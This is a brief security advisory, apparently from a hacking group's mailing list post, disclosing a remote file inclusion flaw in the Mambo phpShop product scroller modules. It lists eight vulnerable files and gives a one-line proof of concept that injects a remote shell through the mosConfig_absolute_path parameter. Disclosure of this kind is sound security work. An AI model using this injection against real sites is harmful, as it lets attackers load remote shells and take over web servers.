########################################################################
###################

# Aria-Security.net Advisory #

# Discovered by: O.U.T.L.A.W #

# < www.Aria-security.net > #

# Gr33t to: A.U.R.A & Hessam-X & Cl0wn & DrtRp #

# #

########################################################################
###################

#Software: mambo-phphop Product Scroller Module

#Attack method: Remote File Inclusion

#Source:

/* Load the phpshop main parse code */

require_once( $mosConfig_absolute_path.'/components/com_phpshop/phpshop_parser.php' );

************************************************************************
************

#Vulnarable Files:

mod_phpshop.php

mod_phpshop_allinone.php

mod_phpshop_cart.php

mod_phpshop_featureprod.php

mod_phpshop_latestprod.php

mod_product_categories.php

mod_productscroller.php

mosproductsnap.php

#Proof of Concept:

#one of the files above.php?mosConfig_absolute_path=SHELL

#

#----------------------------------------------------------

#

#

#Contact : Outlaw (at) aria-security (dot) net [email concealed]

[ reply ]